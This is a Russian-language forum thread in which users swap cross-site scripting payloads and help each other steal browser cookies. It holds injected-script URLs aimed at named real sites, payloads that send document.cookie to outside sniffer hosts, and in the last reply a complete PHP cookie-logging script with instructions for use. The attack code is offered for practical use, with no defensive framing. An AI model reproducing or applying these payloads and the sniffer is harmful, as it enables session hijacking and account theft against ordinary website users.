пробую так! Code: ssss"><script>alert('xss')</script> всё ок выкибывает исправно! пробую так Code: ssss"><script>alert(document.cookie)</script> всё ок кидает куки! пробуё так Code: ssss"><script>img = new Image(); img.src = "http://www.klub.h10.ru/snif/s.php?"+document.cookie;</script> не канает! как отправить кукисы на http://www.klub.h10.ru/snif/s.php
попробуй так "><script src=http://site.com/js.js></script> в js.js - img=new Image();img.src="http://sniffer.ru/s.gif?"+document.cookie;
может и мне кто поможет? нашол вот такой xss <meta http-equiv=Refresh content=0;url=javascript:alert("OK")> пишеш <meta http-equiv=Refresh content=0;url=javascript:document.cookie> показывает куки... делаю ссылку на фаил js.js на снифер ничего не приходит ссылку делаю вот так <meta http-equiv=Refresh content=0;url=javascript:http://my_site/js.js> и вот так вот пробывал <meta http-equiv=Refresh content=0;url=javascript:new Image();img.src="http://my_site/s.gif?"+document.cookie;> может я неправильно ссылку ставлю?
народ вот xss на апорт.ру а как сделать чтобы она кукисы на http://www.klub.h10.ru/snif/s.php отсылала? логи смотреть тут http://www.klub.h10.ru/snif/log.php помогите кто поможет таму + кому помог я тот мне + =) Code: http://sm.aport.ru/scripts/template.dll?That=std&r=%22%3E%3Cscript%3Ealert%28%27XSS_by_Chakir%27%29%3C%2Fscript%3E
у меня ребят вопрос нашел вот http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.cookie)</script> А как сделать чтобы куки пришли мне ведь ни один сниффер-то не пашет na-s.ru прикрыли может кто напишет сниф
Вот .. создаешь файл i.php на своем хосте пишешь туда PHP: <?php if(isset($_GET[1])){ $fp = fopen("log.html", "a+"); fwrite($fp, '<h1>'.date('H:i:s d F Y').'</h1>'."\r\n".'<textarea rows=40 cols=150>'.$_GET[1].'</textarea><br><br>' . "\r\n"); fclose($fp); } ?> там же создаешь файл log.html и права 777 ставишь... А юзать так PHP: <script>var d=document; d.write('<img width=0 src=http://evilxakersait.com/i.php?1='+escape(d.cookie)+'>')</script> http://evilxakersait.com твой сайт куда ты зальешь свой сниффер ... вот что то в этом роде